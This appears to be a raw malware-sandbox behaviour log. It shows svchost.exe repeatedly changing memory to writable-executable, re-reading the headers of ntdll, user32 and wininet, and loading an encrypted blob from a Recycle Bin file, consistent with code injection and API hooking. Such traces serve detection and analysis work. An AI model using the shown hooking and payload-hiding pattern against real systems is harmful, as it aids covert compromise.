Thread created PID: 968 TID: 392 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2081363656
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2081365270
Thread delayed Time: 0 TID: 914 success or wait 2081366154
System info queried Type: ProcessorInformation success or wait 2081366479
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081366882
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081367726
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2081367990
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081368701
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081368963
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2081369273
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081369792
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2081370052
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081370904
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: DB0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081371246
System info queried Type: ProcessorInformation success or wait 2081372442
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081373645
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAF6E20 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081373941
Thread created PID: 968 TID: 2320 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2081375583
Thread created PID: 968 TID: 2328 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2081378325
Thread delayed Time: 0 TID: 914 success or wait 2081380611
Thread delayed Time: 0 TID: 914 success or wait 2081381011
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081381193
System info queried Type: ProcessorInformation success or wait 2081381788
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081382194
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081383044
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2081383305
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081383690
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081383947
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2081384257
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081384854
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2081385111
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081385633
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081385967
System info queried Type: ProcessorInformation success or wait 2081387163
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081388397
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BB10A90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081388702
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081389092
System info queried Type: ProcessorInformation success or wait 2081389674
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081390079
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081390926
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2081391187
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081391567
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081391825
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2081392132
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081392729
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2081392988
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081393508
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081394352
System info queried Type: ProcessorInformation success or wait 2081395479
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081396714
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081397021
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081397372
System info queried Type: ProcessorInformation success or wait 2081397958
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081398364
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081399218
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2081399483
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081399874
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081400132
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2081400443
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081401046
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2081401305
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081401832
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081402170
System info queried Type: ProcessorInformation success or wait 2081403283
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081404617
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAFCF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081404923
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081405360
System info queried Type: ProcessorInformation success or wait 2081405944
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081406347
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081407201
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2081407511
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081407904
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081408165
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2081408474
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081409078
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2081409339
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081409867
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081410204
System info queried Type: ProcessorInformation success or wait 2081411312
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081412542
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BB10168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081412848
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2081413839
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2081416087
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2081417188
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2081431663
System info queried Type: ProcessorInformation success or wait 2081432294
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081432711
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2081433584
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2081433860
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2081434486
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081434758
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 2081435080
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2081435696
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 2081435970
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2081436510
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2081436861
System info queried Type: ProcessorInformation success or wait 2081438056
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081439272
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAFC210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081439726
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2081440129
System info queried Type: ProcessorInformation success or wait 2081440718
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081441049
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081441916
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081442185
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081442804
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081443069
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081443386
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081443998
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081444264
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081444801
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081445145
System info queried Type: ProcessorInformation success or wait 2081446272
System info queried Type: ProcessorInformation success or wait 2081449149
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081449487
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081451207
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081451477
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081451878
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081452146
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081452460
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081453074
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081453341
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081453878
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081454223
System info queried Type: ProcessorInformation success or wait 2081455439
System info queried Type: ProcessorInformation success or wait 2081458412
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081458829
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081459690
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081459959
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081460358
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081460670
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081460984
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081461597
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081461864
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081462403
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081462747
System info queried Type: ProcessorInformation success or wait 2081463875
System info queried Type: ProcessorInformation success or wait 2081467181
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081467597
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081468456
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081468725
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081469124
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081469391
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081469705
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081470318
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081470585
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081471168
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081471512
System info queried Type: ProcessorInformation success or wait 2081472636
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2081475604
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2081476901
System info queried Type: ProcessorInformation success or wait 2081489500
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081489916
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081490781
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081491096
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081491496
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081491762
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081492077
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081492689
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081492956
